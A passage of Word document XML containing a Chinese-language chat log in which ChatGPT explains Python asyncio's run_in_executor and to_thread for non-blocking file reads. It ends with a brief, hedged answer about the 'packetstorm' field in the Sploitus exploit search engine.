          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">read_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来在一个单独的线程中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，所以可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来等待文件读取完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16D23E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558C51E4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，如果你有大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，或者你的文件非常大，那么使用多线程或多进程可能会更有效。这是因为文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作通常是阻塞性的，如果你在主线程中执行大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，可能会阻塞你的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E689B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266FAE71" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 3.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to_thread </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，可以更方便地在新线程中运行阻塞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583FE5F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C23A68" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4794F3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A2112" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51436D81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def read_file(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CCD005" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    with open(file_path, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265527B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        data = await asyncio.to_thread(file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE12711" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4889F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1A269B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C480969" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    data = await read_file('my_file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DD9CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB8C949" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580EEA7C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F467648" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D347CD3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.to_thread </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行在一个新的线程中，当操作完成时，返回其结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A58E3B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E56A3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>细说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data = await loop.run_in_executor(None, file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E5F97" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685FC6C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D318989" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop.run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的一个函数，它可以将一个函数的执行委托给一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Executor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个线程池（默认）或者进程池，可以在后台执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任务。通过这种方式，我们可以将一些耗时的、阻塞性的任务放在后台执行，避免阻塞事件循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00761F7F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA2ECA1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个函数，它会读取文件的全部内容。因为读取文件是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O-bound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的操作，所以我们可以将它放在一个线程中执行，避免阻塞事件循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5CBDBF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE824DA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loop.run_in_executor(None, file.read) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的执行委托给一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个函数返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA7837" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7342B895" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">None </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示使用默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即线程池。如果你想使用自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以传递一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B02DD4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDB080A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字则是等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的结果。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数执行完成，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的结果就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的返回值，也就是文件的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0424B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178C2F36" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data = await loop.run_in_executor(None, file.read) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这行代码的意思就是：将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的执行委托给一个线程，然后等待它的结果，将结果赋值给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FBD6BF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A5D11" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>packetstorm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72811C6E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C9E32" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BDD647" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据我的知识库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一款漏洞搜索引擎，它能够搜索公开的漏洞数据库，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploit-DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等等。但至我知识库的更新截止（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月），没有关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>packetstorm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD25422" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F27D62" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>packetstorm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能是指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Packet Storm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站，这是一个受到广大安全研究者和黑客欢迎的安全和漏洞信息网站，提供各种安全工具，漏洞报告和相关文章等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C0FB0F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6C3BDA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你看到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的某个响应或界面中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>packetstorm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，可能是表示这个漏洞信息来源于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Packet Storm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站，或者提供了链接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Packet Storm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的相关页面。具体的含义和用法，你需要查阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官方文档或者相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档。</w:t>
      </w:r>
    </w:p>
